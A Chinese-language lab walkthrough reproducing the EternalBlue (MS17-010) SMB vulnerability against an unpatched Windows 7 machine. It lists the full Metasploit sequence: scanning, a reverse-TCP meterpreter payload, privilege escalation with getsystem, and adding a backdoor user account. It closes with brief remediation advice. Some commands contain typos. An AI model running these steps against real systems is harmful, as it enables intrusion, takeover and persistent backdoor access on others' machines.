文章目录
前言
永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用美国国家安全局泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 ,“永恒之蓝”是利用Windows系统的SMB漏洞来获取Windows系统的最高权限。
原理
永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
准备工作
- 靶机:Windows 7 (IP:192.168.43.215)
- 攻击机:Kali-Linux-2021 (IP:192.168.43.77)
- 工具:Nmap、metasploit(msf)
- kali-Linux-2021与Windows 7能够相互ping通;Windows 7靶机不要打补丁
漏洞复现
01 使用攻击机kali ping靶机windows 7 测试连通性
ping 192.168.43.215 -c 3
02 使用nmap工具探测靶机的开放端口和系统版本
nmap -sV 192.168.43.215
如上图可以发现445端口处于开放状态
03 启动kali自带的msf工具
msfconsole
04 搜索永恒之蓝漏洞可使用的攻击模块
search 17_010
编号0为永恒之蓝漏洞的攻击模块;编号3为永恒之蓝的扫描模块,用于验证漏洞是否存在。
05 使用永恒之蓝扫描模块来验证漏洞是否存在
use 3
06 查看永恒之蓝扫描模块的配置项
show options
如上图所示只需配置RHOSTS (目标靶机)即可。
07 配置目标靶机并使用exploit或run命令进行检测,显示靶机存在永恒之蓝漏洞
set rhosts 192.168.43.215 #设置目标靶机IP
exoloit #验证漏洞
08 使用永恒之蓝漏洞攻击模块
use 0 #使用攻击模块
show options #查看配置项
如上图所示需要配置目标靶机IP和攻击载荷。
09 配置目标靶机和攻击载荷
set rhost 192.168.43.215 #设置靶机ip
set payload Windows/x64/meterpreter/severse_tcp #配置攻击载荷并且使用反向连接
10 最后开始攻击
run
显示WIN则代表攻击成功。
11 后渗透操作
getuid #查看当前用户权限
可以看到是普通权限,如下图所示:
getsystem #提权
shell #进入shell
chcp 65001 #改变当前的编码为UTF-8,防止显示乱码
net user test 123456.. /add #对靶机新建一个后门用户
修复方案
关闭445端口。
打开防火墙,安装安全软件。
安装对应补丁。
总结
为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。